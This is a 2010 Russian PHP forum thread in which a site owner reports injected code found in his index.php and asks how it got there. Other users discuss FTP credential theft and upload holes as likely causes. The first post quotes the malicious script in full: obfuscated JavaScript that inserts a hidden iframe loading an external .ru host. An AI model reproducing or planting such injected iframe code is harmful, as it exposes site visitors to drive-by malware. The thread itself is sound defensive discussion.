ФорумПрограммированиеPHP для идиотов → Вирусы на сайте.

Вирусы на сайте.

  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 11:45

    Недавно обнаружил на своем первом сайте вот такую штуку:

    <script id="Azp01wx1fdv" defer="defer" src="http://discuss-com-hk.elance.com.sponsorads-de.homeproair.ru:8080/lenta.ru/lenta.ru/windowslive.com/sapo.pt/google.com/" type="text/javascript">
    1
    2J5jkkw1 = '[email protected]&)s$^)@c((#[email protected]^&!)[email protected]($#()c^@&o&&m^&-&&)h&[email protected]$!$.#&!e)$l!#[email protected]^[email protected][email protected]#c(!#!e&)@^.#c$&^!^o&^m)))).^)$s)p$&@o)[email protected]!s(&[email protected]!r)#$a#(d&s!&-&[email protected][email protected]))[email protected]@(.#@(#h!o(@)m!e$^$p^()r^o#!a&i!)r&#@.^)!&r!^[email protected]())'.replace(/\$|@|\!|\(|#|\^|&|\)/ig, '');
    3f = document.createElement('iframe');
    4f.src = 'http://'+J5jkkw1+':8080/index.php?ys';
    5f.style.visibility = 'h!))&i&)d!^d&e$(#n!$#(&'.replace(/&|\!|\^|@|\$|\(|\)|#/ig, '');
    6document.body.appendChild(f);
    </script>
    <iframe src="http://discuss-com-hk.elance.com.sponsorads-de.homeproair.ru:8080/index.php?ys" style="visibility: hidden;">


    Мне очень интересно что это и как туда попало.

    Просветите пожалуйста =) можно ссылочками
  • phpdude

    Сообщения: 26624 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 11:51, спустя 5 минут 57 секунд

    обычный ифрейм вирус ..
    Сапожник без сапог
  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 11:56, спустя 5 минут 17 секунд

    а нафига вот так шифровать?

    [email protected]&)s$^)@c((#[email protected]^&!)[email protected]($#()c^@&o&&m^&-&&)h&[email protected]$!$.#&!e)$l!#[email protected]^[email protected][email protected]#c(!#!e&)@^.#c$&^!^o&^m)))).^)$s)p$&@o)[email protected]!s(&[email protected]!r)#$a#(d&s!&-&[email protected][email protected]))[email protected]@(.#@(#h!o(@)m!e$^$p^()r^o#!a&i!)r&#@.^)!&r!^[email protected]())

    Если получается
    discuss-com-hk.elance.com.sponsorads-de.homeproair.ru

    что в принципе мы и так можем видеть.

    и вот это нафига шифровать
    h!))&i&)d!^d&e$(#n!$#(& == hidden
  • phpdude

    Сообщения: 26624 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 12:05, спустя 8 минут 54 секунды

    да это продукт "хакерский" какой нить. а владелец дора этого дитя 14 летнее какое нить
    Сапожник без сапог
  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 12:13, спустя 7 минут 31 секунду

    А как могли мне эты фигню засунуть? Только через ФТП? или есть еще какие то способы?
  • phpdude

    Сообщения: 26624 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 12:36, спустя 23 минуты 52 секунды


    А как могли мне эты фигню засунуть? Только через ФТП? или есть еще какие то способы?
    самый тупой метод - фтп. получше метод - через говнокод сайта :)
    Сапожник без сапог
  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 12:50, спустя 13 минут 39 секунд

    Я вот и пытаюсь выпытать как через мой говнокод можно было это сделать.
    Код был записан в index.php. Права на файл 644.
  • Faster

    Сообщения: 1159 Репутация: N Группа: Кто попало

    Spritz 20 января 2010 г. 12:52, спустя 1 минуту 59 секунд

    вротпресс?
  • adw0rd

    Сообщения: 22905 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 12:59, спустя 6 минут 28 секунд


    вротпресс?
    ичо?
    adw/0
  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 12:59, спустя 46 секунд

    нет =) это мой первый сайт. Говнокод в основном.
  • adw0rd

    Сообщения: 22905 Репутация: N Группа: в ухо
  • AlexB

    Сообщения: 4290 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 13:09, спустя 9 минут


    Код был записан в index.php.
    Так обычно и бывает, его же робот пихает … он сканит диры на предмет имени index
  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 13:10, спустя 1 минуту 4 секунды

    Да, да читал, спасибо, Я решил сайтик этот переписать, так что все равно все с нуля писать буду. Мне просто интересно как от этого защититься. Не постоянно же лечить.
    Хочу закрыть по возможности все дыры (если конечно возможно). А для этого необходимо узнать каким образом они редактируют мои файлы?
  • AlexB

    Сообщения: 4290 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 13:16, спустя 5 минут 58 секунд


    А для этого необходимо узнать каким образом они редактируют мои файлы?
    Скорее всего ftp. Если нет, то так сложно сказать, я бы внимательно посмотрел все места где есть upload … исследовать диры куда что-то аплоадится на предмет наличия в них файлов с расширением php.
  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 13:28, спустя 12 минут 45 секунд

    Сайт визитка. В принципе нет форм загрузки.
    Да даже если бы и были, как получить мой оригинальный index?

    Понятно, меняем пароли =)

Пожалуйста, авторизуйтесь, чтобы написать комментарий!